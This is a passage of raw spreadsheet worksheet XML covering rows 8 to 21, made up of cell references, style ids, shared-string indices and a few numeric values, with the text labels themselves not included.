      <c r="AL8" s="54" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="9" ht="107.25" customHeight="1">
      <c r="B9" s="44" t="s">
        <v>46</v>
      </c>
      <c r="C9" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D9" s="45" t="s">
        <v>109</v>
      </c>
      <c r="E9" s="45" t="s">
        <v>110</v>
      </c>
      <c r="F9" s="45" t="s">
        <v>111</v>
      </c>
      <c r="G9" s="61" t="s">
        <v>112</v>
      </c>
      <c r="H9" s="46" t="s">
        <v>113</v>
      </c>
      <c r="I9" s="46" t="s">
        <v>114</v>
      </c>
      <c r="J9" s="46" t="s">
        <v>115</v>
      </c>
      <c r="K9" s="47">
        <v>1.0</v>
      </c>
      <c r="L9" s="47">
        <v>0.0</v>
      </c>
      <c r="M9" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N9" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O9" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P9" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q9" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R9" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S9" s="50"/>
      <c r="T9" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U9" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V9" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W9" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X9" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y9" s="52">
        <v>2002749.0</v>
      </c>
      <c r="Z9" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AA9" s="52">
        <v>1.0</v>
      </c>
      <c r="AB9" s="49">
        <v>2002749.0</v>
      </c>
      <c r="AC9" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AD9" s="46" t="s">
        <v>116</v>
      </c>
      <c r="AE9" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AF9" s="53" t="s">
        <v>117</v>
      </c>
      <c r="AG9" s="46" t="s">
        <v>118</v>
      </c>
      <c r="AH9" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI9" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ9" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK9" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL9" s="54" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="10" ht="107.25" customHeight="1">
      <c r="B10" s="44" t="s">
        <v>119</v>
      </c>
      <c r="C10" s="55" t="s">
        <v>10</v>
      </c>
      <c r="D10" s="45" t="s">
        <v>120</v>
      </c>
      <c r="E10" s="45" t="s">
        <v>121</v>
      </c>
      <c r="F10" s="55" t="s">
        <v>122</v>
      </c>
      <c r="G10" s="45" t="s">
        <v>123</v>
      </c>
      <c r="H10" s="63" t="s">
        <v>124</v>
      </c>
      <c r="I10" s="46" t="s">
        <v>125</v>
      </c>
      <c r="J10" s="46" t="s">
        <v>126</v>
      </c>
      <c r="K10" s="47">
        <v>1.0</v>
      </c>
      <c r="L10" s="47">
        <v>0.0</v>
      </c>
      <c r="M10" s="48" t="s">
        <v>127</v>
      </c>
      <c r="N10" s="48">
        <v>44.0</v>
      </c>
      <c r="O10" s="48">
        <v>9562.0</v>
      </c>
      <c r="P10" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q10" s="50" t="s">
        <v>128</v>
      </c>
      <c r="R10" s="50">
        <v>59.0</v>
      </c>
      <c r="S10" s="50">
        <v>12739.0</v>
      </c>
      <c r="T10" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U10" s="51" t="s">
        <v>129</v>
      </c>
      <c r="V10" s="51">
        <v>65.0</v>
      </c>
      <c r="W10" s="51">
        <v>732342.0</v>
      </c>
      <c r="X10" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y10" s="52" t="s">
        <v>130</v>
      </c>
      <c r="Z10" s="52">
        <v>79.0</v>
      </c>
      <c r="AA10" s="52">
        <v>757724.0</v>
      </c>
      <c r="AB10" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC10" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AD10" s="46" t="s">
        <v>131</v>
      </c>
      <c r="AE10" s="46" t="s">
        <v>132</v>
      </c>
      <c r="AF10" s="53" t="s">
        <v>133</v>
      </c>
      <c r="AG10" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AH10" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI10" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ10" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK10" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL10" s="54" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="11" ht="96.75" customHeight="1">
      <c r="B11" s="44" t="s">
        <v>119</v>
      </c>
      <c r="C11" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D11" s="45" t="s">
        <v>134</v>
      </c>
      <c r="E11" s="45" t="s">
        <v>135</v>
      </c>
      <c r="F11" s="45" t="s">
        <v>122</v>
      </c>
      <c r="G11" s="61" t="s">
        <v>136</v>
      </c>
      <c r="H11" s="46" t="s">
        <v>137</v>
      </c>
      <c r="I11" s="46" t="s">
        <v>138</v>
      </c>
      <c r="J11" s="46" t="s">
        <v>139</v>
      </c>
      <c r="K11" s="47">
        <v>1.0</v>
      </c>
      <c r="L11" s="47">
        <v>0.0</v>
      </c>
      <c r="M11" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N11" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O11" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P11" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q11" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R11" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S11" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T11" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U11" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V11" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W11" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X11" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y11" s="52">
        <v>2002749.0</v>
      </c>
      <c r="Z11" s="52">
        <v>1.0</v>
      </c>
      <c r="AA11" s="52">
        <v>3.0</v>
      </c>
      <c r="AB11" s="49">
        <v>2002749.0</v>
      </c>
      <c r="AC11" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AD11" s="46" t="s">
        <v>140</v>
      </c>
      <c r="AE11" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AF11" s="53" t="s">
        <v>141</v>
      </c>
      <c r="AG11" s="46" t="s">
        <v>142</v>
      </c>
      <c r="AH11" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI11" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ11" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK11" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL11" s="54" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="12" ht="96.75" customHeight="1">
      <c r="B12" s="44" t="s">
        <v>119</v>
      </c>
      <c r="C12" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D12" s="45" t="s">
        <v>143</v>
      </c>
      <c r="E12" s="45" t="s">
        <v>144</v>
      </c>
      <c r="F12" s="45" t="s">
        <v>145</v>
      </c>
      <c r="G12" s="61" t="s">
        <v>144</v>
      </c>
      <c r="H12" s="46" t="s">
        <v>146</v>
      </c>
      <c r="I12" s="46" t="s">
        <v>147</v>
      </c>
      <c r="J12" s="46" t="s">
        <v>148</v>
      </c>
      <c r="K12" s="47">
        <v>1.0</v>
      </c>
      <c r="L12" s="47">
        <v>0.0</v>
      </c>
      <c r="M12" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N12" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O12" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P12" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q12" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R12" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S12" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T12" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U12" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V12" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W12" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X12" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y12" s="52" t="s">
        <v>149</v>
      </c>
      <c r="Z12" s="52">
        <v>4.0</v>
      </c>
      <c r="AA12" s="52">
        <v>12.0</v>
      </c>
      <c r="AB12" s="49">
        <v>2002752.2002749</v>
      </c>
      <c r="AC12" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AD12" s="46" t="s">
        <v>150</v>
      </c>
      <c r="AE12" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AF12" s="53" t="s">
        <v>151</v>
      </c>
      <c r="AG12" s="46" t="s">
        <v>152</v>
      </c>
      <c r="AH12" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI12" s="47" t="s">
        <v>153</v>
      </c>
      <c r="AJ12" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK12" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL12" s="54" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="13" ht="96.75" customHeight="1">
      <c r="B13" s="44" t="s">
        <v>119</v>
      </c>
      <c r="C13" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D13" s="45" t="s">
        <v>143</v>
      </c>
      <c r="E13" s="45" t="s">
        <v>144</v>
      </c>
      <c r="F13" s="45" t="s">
        <v>145</v>
      </c>
      <c r="G13" s="61" t="s">
        <v>144</v>
      </c>
      <c r="H13" s="46" t="s">
        <v>154</v>
      </c>
      <c r="I13" s="46" t="s">
        <v>147</v>
      </c>
      <c r="J13" s="46" t="s">
        <v>155</v>
      </c>
      <c r="K13" s="47">
        <v>1.0</v>
      </c>
      <c r="L13" s="47">
        <v>0.0</v>
      </c>
      <c r="M13" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N13" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O13" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P13" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q13" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R13" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S13" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T13" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U13" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V13" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W13" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X13" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y13" s="52" t="s">
        <v>149</v>
      </c>
      <c r="Z13" s="52">
        <v>4.0</v>
      </c>
      <c r="AA13" s="52">
        <v>10.0</v>
      </c>
      <c r="AB13" s="49" t="s">
        <v>156</v>
      </c>
      <c r="AC13" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AD13" s="46" t="s">
        <v>150</v>
      </c>
      <c r="AE13" s="46" t="s">
        <v>10</v>
      </c>
      <c r="AF13" s="53" t="s">
        <v>157</v>
      </c>
      <c r="AG13" s="46" t="s">
        <v>158</v>
      </c>
      <c r="AH13" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI13" s="47" t="s">
        <v>153</v>
      </c>
      <c r="AJ13" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK13" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL13" s="54" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="14" ht="222.75" customHeight="1">
      <c r="B14" s="44" t="s">
        <v>119</v>
      </c>
      <c r="C14" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D14" s="45" t="s">
        <v>143</v>
      </c>
      <c r="E14" s="45" t="s">
        <v>159</v>
      </c>
      <c r="F14" s="45" t="s">
        <v>160</v>
      </c>
      <c r="G14" s="61" t="s">
        <v>159</v>
      </c>
      <c r="H14" s="46" t="s">
        <v>161</v>
      </c>
      <c r="I14" s="46" t="s">
        <v>162</v>
      </c>
      <c r="J14" s="46" t="s">
        <v>163</v>
      </c>
      <c r="K14" s="47">
        <v>1.0</v>
      </c>
      <c r="L14" s="47">
        <v>0.0</v>
      </c>
      <c r="M14" s="48" t="s">
        <v>164</v>
      </c>
      <c r="N14" s="48">
        <v>12.0</v>
      </c>
      <c r="O14" s="48">
        <v>4718.0</v>
      </c>
      <c r="P14" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q14" s="50" t="s">
        <v>165</v>
      </c>
      <c r="R14" s="50">
        <v>25.0</v>
      </c>
      <c r="S14" s="50">
        <v>4986.0</v>
      </c>
      <c r="T14" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U14" s="51" t="s">
        <v>166</v>
      </c>
      <c r="V14" s="51">
        <v>35.0</v>
      </c>
      <c r="W14" s="51">
        <v>10020.0</v>
      </c>
      <c r="X14" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y14" s="52" t="s">
        <v>167</v>
      </c>
      <c r="Z14" s="52">
        <v>56.0</v>
      </c>
      <c r="AA14" s="52">
        <v>12833.0</v>
      </c>
      <c r="AB14" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC14" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AD14" s="46" t="s">
        <v>168</v>
      </c>
      <c r="AE14" s="56" t="s">
        <v>169</v>
      </c>
      <c r="AF14" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG14" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH14" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI14" s="47" t="s">
        <v>153</v>
      </c>
      <c r="AJ14" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK14" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL14" s="54" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="15" ht="222.75" customHeight="1">
      <c r="B15" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C15" s="45" t="s">
        <v>172</v>
      </c>
      <c r="D15" s="45" t="s">
        <v>173</v>
      </c>
      <c r="E15" s="45" t="s">
        <v>174</v>
      </c>
      <c r="F15" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G15" s="61" t="s">
        <v>10</v>
      </c>
      <c r="H15" s="46" t="s">
        <v>175</v>
      </c>
      <c r="I15" s="46" t="s">
        <v>176</v>
      </c>
      <c r="J15" s="46" t="s">
        <v>177</v>
      </c>
      <c r="K15" s="47">
        <v>1.0</v>
      </c>
      <c r="L15" s="47">
        <v>0.0</v>
      </c>
      <c r="M15" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N15" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O15" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P15" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q15" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R15" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S15" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T15" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U15" s="51" t="s">
        <v>178</v>
      </c>
      <c r="V15" s="51">
        <v>2.0</v>
      </c>
      <c r="W15" s="51">
        <v>6.0</v>
      </c>
      <c r="X15" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y15" s="52" t="s">
        <v>179</v>
      </c>
      <c r="Z15" s="52">
        <v>7.0</v>
      </c>
      <c r="AA15" s="52">
        <v>53.0</v>
      </c>
      <c r="AB15" s="49" t="s">
        <v>180</v>
      </c>
      <c r="AC15" s="47" t="s">
        <v>181</v>
      </c>
      <c r="AD15" s="46" t="s">
        <v>182</v>
      </c>
      <c r="AE15" s="46" t="s">
        <v>183</v>
      </c>
      <c r="AF15" s="53" t="s">
        <v>184</v>
      </c>
      <c r="AG15" s="46" t="s">
        <v>185</v>
      </c>
      <c r="AH15" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI15" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ15" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK15" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL15" s="54" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="16" ht="153.75" customHeight="1">
      <c r="B16" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C16" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D16" s="45" t="s">
        <v>186</v>
      </c>
      <c r="E16" s="45" t="s">
        <v>187</v>
      </c>
      <c r="F16" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G16" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H16" s="46" t="s">
        <v>188</v>
      </c>
      <c r="I16" s="46" t="s">
        <v>189</v>
      </c>
      <c r="J16" s="46" t="s">
        <v>190</v>
      </c>
      <c r="K16" s="47">
        <v>1.0</v>
      </c>
      <c r="L16" s="47">
        <v>0.0</v>
      </c>
      <c r="M16" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N16" s="48">
        <v>0.0</v>
      </c>
      <c r="O16" s="48">
        <v>0.0</v>
      </c>
      <c r="P16" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q16" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R16" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S16" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T16" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U16" s="51">
        <v>50447.0</v>
      </c>
      <c r="V16" s="51">
        <v>1.0</v>
      </c>
      <c r="W16" s="51">
        <v>3.0</v>
      </c>
      <c r="X16" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y16" s="52" t="s">
        <v>191</v>
      </c>
      <c r="Z16" s="52">
        <v>3.0</v>
      </c>
      <c r="AA16" s="52">
        <v>7.0</v>
      </c>
      <c r="AB16" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC16" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD16" s="65" t="s">
        <v>192</v>
      </c>
      <c r="AE16" s="65" t="s">
        <v>193</v>
      </c>
      <c r="AF16" s="53" t="s">
        <v>194</v>
      </c>
      <c r="AG16" s="46" t="s">
        <v>195</v>
      </c>
      <c r="AH16" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI16" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ16" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK16" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL16" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="17" ht="153.75" customHeight="1">
      <c r="B17" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C17" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D17" s="45" t="s">
        <v>186</v>
      </c>
      <c r="E17" s="45" t="s">
        <v>187</v>
      </c>
      <c r="F17" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G17" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H17" s="46" t="s">
        <v>188</v>
      </c>
      <c r="I17" s="46" t="s">
        <v>189</v>
      </c>
      <c r="J17" s="46" t="s">
        <v>196</v>
      </c>
      <c r="K17" s="47">
        <v>1.0</v>
      </c>
      <c r="L17" s="47">
        <v>0.0</v>
      </c>
      <c r="M17" s="48" t="s">
        <v>197</v>
      </c>
      <c r="N17" s="48">
        <v>3.0</v>
      </c>
      <c r="O17" s="48">
        <v>5.0</v>
      </c>
      <c r="P17" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q17" s="50" t="s">
        <v>198</v>
      </c>
      <c r="R17" s="50">
        <v>9.0</v>
      </c>
      <c r="S17" s="50">
        <v>82.0</v>
      </c>
      <c r="T17" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U17" s="51" t="s">
        <v>199</v>
      </c>
      <c r="V17" s="51">
        <v>13.0</v>
      </c>
      <c r="W17" s="51">
        <v>458.0</v>
      </c>
      <c r="X17" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y17" s="52" t="s">
        <v>200</v>
      </c>
      <c r="Z17" s="52">
        <v>17.0</v>
      </c>
      <c r="AA17" s="52">
        <v>536.0</v>
      </c>
      <c r="AB17" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC17" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD17" s="65" t="s">
        <v>192</v>
      </c>
      <c r="AE17" s="65" t="s">
        <v>193</v>
      </c>
      <c r="AF17" s="53" t="s">
        <v>201</v>
      </c>
      <c r="AG17" s="46" t="s">
        <v>202</v>
      </c>
      <c r="AH17" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI17" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ17" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK17" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL17" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="18" ht="153.75" customHeight="1">
      <c r="B18" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C18" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D18" s="45" t="s">
        <v>186</v>
      </c>
      <c r="E18" s="45" t="s">
        <v>187</v>
      </c>
      <c r="F18" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G18" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H18" s="46" t="s">
        <v>188</v>
      </c>
      <c r="I18" s="46" t="s">
        <v>203</v>
      </c>
      <c r="J18" s="46" t="s">
        <v>204</v>
      </c>
      <c r="K18" s="47">
        <v>1.0</v>
      </c>
      <c r="L18" s="47">
        <v>0.0</v>
      </c>
      <c r="M18" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N18" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O18" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P18" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q18" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R18" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S18" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T18" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U18" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V18" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W18" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X18" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y18" s="52">
        <v>2002749.0</v>
      </c>
      <c r="Z18" s="52">
        <v>1.0</v>
      </c>
      <c r="AA18" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB18" s="49">
        <v>2002749.0</v>
      </c>
      <c r="AC18" s="64" t="s">
        <v>205</v>
      </c>
      <c r="AD18" s="65" t="s">
        <v>206</v>
      </c>
      <c r="AE18" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF18" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG18" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH18" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI18" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ18" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK18" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL18" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="19" ht="196.5" customHeight="1">
      <c r="B19" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C19" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D19" s="45" t="s">
        <v>207</v>
      </c>
      <c r="E19" s="45" t="s">
        <v>208</v>
      </c>
      <c r="F19" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G19" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H19" s="46" t="s">
        <v>209</v>
      </c>
      <c r="I19" s="46" t="s">
        <v>210</v>
      </c>
      <c r="J19" s="46" t="s">
        <v>211</v>
      </c>
      <c r="K19" s="47">
        <v>1.0</v>
      </c>
      <c r="L19" s="47">
        <v>0.0</v>
      </c>
      <c r="M19" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N19" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O19" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P19" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q19" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R19" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S19" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T19" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U19" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V19" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W19" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X19" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y19" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z19" s="52">
        <v>2.0</v>
      </c>
      <c r="AA19" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB19" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC19" s="64" t="s">
        <v>212</v>
      </c>
      <c r="AD19" s="65" t="s">
        <v>213</v>
      </c>
      <c r="AE19" s="65" t="s">
        <v>214</v>
      </c>
      <c r="AF19" s="53" t="s">
        <v>215</v>
      </c>
      <c r="AG19" s="65" t="s">
        <v>216</v>
      </c>
      <c r="AH19" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI19" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ19" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK19" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL19" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="20" ht="177.0" customHeight="1">
      <c r="B20" s="44" t="s">
        <v>171</v>
      </c>
      <c r="C20" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D20" s="45" t="s">
        <v>207</v>
      </c>
      <c r="E20" s="45" t="s">
        <v>208</v>
      </c>
      <c r="F20" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G20" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H20" s="46" t="s">
        <v>217</v>
      </c>
      <c r="I20" s="46" t="s">
        <v>210</v>
      </c>
      <c r="J20" s="46" t="s">
        <v>218</v>
      </c>
      <c r="K20" s="47">
        <v>1.0</v>
      </c>
      <c r="L20" s="47">
        <v>0.0</v>
      </c>
      <c r="M20" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N20" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O20" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P20" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q20" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R20" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S20" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T20" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U20" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V20" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W20" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X20" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y20" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z20" s="52">
        <v>2.0</v>
      </c>
      <c r="AA20" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AB20" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC20" s="64" t="s">
        <v>212</v>
      </c>
      <c r="AD20" s="65" t="s">
        <v>213</v>
      </c>
      <c r="AE20" s="65" t="s">
        <v>219</v>
      </c>
      <c r="AF20" s="53" t="s">
        <v>215</v>
      </c>
      <c r="AG20" s="65" t="s">
        <v>220</v>
      </c>
      <c r="AH20" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI20" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ20" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK20" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL20" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="21" ht="153.75" customHeight="1">
      <c r="B21" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C21" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D21" s="45" t="s">
        <v>221</v>
      </c>
      <c r="E21" s="45" t="s">
        <v>222</v>
      </c>
      <c r="F21" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G21" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H21" s="46" t="s">
        <v>223</v>
      </c>
      <c r="I21" s="46" t="s">
        <v>224</v>
      </c>
      <c r="J21" s="46" t="s">
        <v>225</v>
      </c>
      <c r="K21" s="47">
        <v>1.0</v>
      </c>
      <c r="L21" s="47">
        <v>0.0</v>
      </c>
      <c r="M21" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N21" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O21" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P21" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q21" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R21" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S21" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T21" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U21" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V21" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W21" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X21" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y21" s="52" t="s">
        <v>10</v>
      </c>
      <c r="Z21" s="52" t="s">
        <v>10</v>
      </c>
      <c r="AA21" s="52" t="s">
        <v>10</v>
